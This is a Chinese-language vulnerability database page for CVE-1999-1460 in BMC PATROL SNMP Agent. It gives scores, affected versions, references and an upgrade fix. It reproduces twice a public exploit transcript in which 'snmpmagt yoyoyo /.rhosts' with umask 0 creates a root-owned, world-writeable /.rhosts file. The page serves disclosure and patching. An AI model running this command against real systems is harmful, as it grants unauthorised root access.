CVE-1999-1460
CVSS7.2
发布时间 :1999-07-13 00:00:00
修订时间 :2016-10-17 22:04:48
NMCOES    

[原文]BMC PATROL SNMP Agent before 3.2.07 allows local users to create arbitrary world-writeable files as root by specifying the target file as the second argument to the snmpmagt program.


[CNNVD]BMC Patrol SNMP Agent文件创建/许可漏洞(CNNVD-199907-015)

        BMC PATROL SNMP Agent 3.2.07之前的版本存在漏洞。本地用户可以通过指定目标文件作为snmpmagt程序的第二参数,来将任意全域可写文件创建为根。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:bmc:patrol_agent:3.2BMC Software PATROL Agent 3.2
cpe:/a:bmc:patrol_agent:3.2.3BMC Software PATROL Agent 3.2.3
cpe:/a:bmc:patrol_agent:3.2.7BMC Software PATROL Agent 3.2.07
cpe:/a:bmc:patrol_agent:3.2.5BMC Software PATROL Agent 3.2.5

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1460
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-1460
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199907-015
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=93198293132463&w=2
(UNKNOWN)  BUGTRAQ  19990713 Root Perms Gained with Patrol SNMP Agent 3.2 (all others?)
http://marc.info/?l=bugtraq&m=93372579004129&w=2
(UNKNOWN)  BUGTRAQ  19990801 Re: Root Perms Gained with Patrol SNMP Agent 3.2 (all others?)
http://www.securityfocus.com/bid/525
(VENDOR_ADVISORY)  BID  525

- 漏洞信息

BMC Patrol SNMP Agent文件创建/许可漏洞
高危 输入验证
1999-07-13 00:00:00 2005-10-20 00:00:00
本地  
        BMC PATROL SNMP Agent 3.2.07之前的版本存在漏洞。本地用户可以通过指定目标文件作为snmpmagt程序的第二参数,来将任意全域可写文件创建为根。

- 公告与补丁

        The solution for this issue is to upgrade to a release of the BMC PATROL product higher than 3.2.05. That is, this issue is limited to PATROL Version 3.2 to 3.2.05 only - all versions 3.2.07 and higher, including PATROL Version 3.3.xx, are OK.

- 漏洞信息 (19422)

BMC Software Patrol <= 3.2.5 Patrol SNMP Agent File Creation/Permission Vulnerability (EDBID:19422)
linux local
1999-07-14 Verified
0 Andrew Alness
N/A [点击下载]
source: http://www.securityfocus.com/bid/525/info


Patrol 3.2, installed out of the box, allows for a local root compromise or denial of service. The vulnerability lies in the creation of a file by snmpagnt that is owned by the owner of the parent directory of the file and possibly world writeable. A local user can specify any file (/.rhosts) and create it / set the permissions according to the user's umask.

maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> ls -al snmpmagt
-rwsr-xr-x 1 root users 185461 Mar 6 1998 snmpmagt*

maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> ls -al /.rhosts
/.rhosts not found

maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> umask 0

maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> snmpmagt yoyoyo /.rhosts

yoyoyo: No such file or directory
snmp bind failure: Address already in use
/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin/snmpmagt: error processing configuration

maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> ls -al /.rhosts
-rw-rw-rw- 1 root users 770 Jul 13 14:42 .rhosts

note: If the file exists, it keeps the same perms and overwrites it
with "i^A" then the result of gethostname() and some whitespace. this
problem is not platform dependent and was tested based on out of box
install on an HP. 		

- 漏洞信息

11646
BMC PATROL SNMP Agent snmpmagt Arbitrary World-writeable File Creation
Local Access Required Misconfiguration
Loss of Integrity Solution Unknown
Exploit Public

- 漏洞描述

- 时间线

1999-07-13 Unknow
1999-07-13 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

BMC Patrol SNMP Agent File Creation/Permission Vulnerability
Input Validation Error 525
No Yes
1999-07-14 12:00:00 2009-07-11 12:56:00
First posted to BugTraq by Andrew Alness <alness@gti.net> on July 14, 1999. Parts of the discussion were taken directly from Andrew's BugTraq posting. Graeme Byrnes <graeme_byrnes@bmc.com> a Technical Support Specialist at BMC Software snet fix information

- 受影响的程序版本

BMC Software Patrol 3.2.5
BMC Software Patrol 3.2.3
BMC Software Patrol 3.2
- Data General DG/UX 8.0
- Data General DG/UX 7.0
- Digital UNIX 4.0
- HP HP-UX 11.0
- HP HP-UX 10.0
- HP HP-UX 9.0
- IBM AIX 4.2.1
- IBM AIX 4.2
- SCO Open Server 5.0
- SCO Unixware 7.0
- Sequent Dynix 3.0.17
- Sequent Dynix 3.0.12
- SGI IRIX 6.5.4
- SGI IRIX 6.5
- SGI IRIX 6.4
- Sun Solaris 7.0_x86
- Sun Solaris 7.0
- Sun Solaris 2.6_x86
- Sun Solaris 2.6
- Sun Solaris 2.5_x86
- Sun Solaris 2.5
BMC Software Patrol 3.2.7

- 不受影响的程序版本

BMC Software Patrol 3.2.7

- 漏洞讨论

Patrol 3.2, installed out of the box, allows for a local root compromise or denial of service. The vulnerability lies in the creation of a file by snmpagnt that is owned by the owner of the parent directory of the file and possibly world writeable. A local user can specify any file (/.rhosts) and create it / set the permissions according to the user's umask.

- 漏洞利用

maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin&gt; ls -al snmpmagt
-rwsr-xr-x 1 root users 185461 Mar 6 1998 snmpmagt*

maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin&gt; ls -al /.rhosts
/.rhosts not found

maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin&gt; umask 0

maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin&gt; snmpmagt yoyoyo /.rhosts

yoyoyo: No such file or directory
snmp bind failure: Address already in use
/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin/snmpmagt: error processing configuration

maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin&gt; ls -al /.rhosts
-rw-rw-rw- 1 root users 770 Jul 13 14:42 .rhosts

note: If the file exists, it keeps the same perms and overwrites it
with "i^A" then the result of gethostname() and some whitespace. this
problem is not platform dependent and was tested based on out of box
install on an HP.

- 解决方案

The solution for this issue is to upgrade to a release of the BMC PATROL product higher than 3.2.05. That is, this issue is limited to PATROL Version 3.2 to 3.2.05 only - all versions 3.2.07 and higher, including PATROL Version 3.3.xx, are OK.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站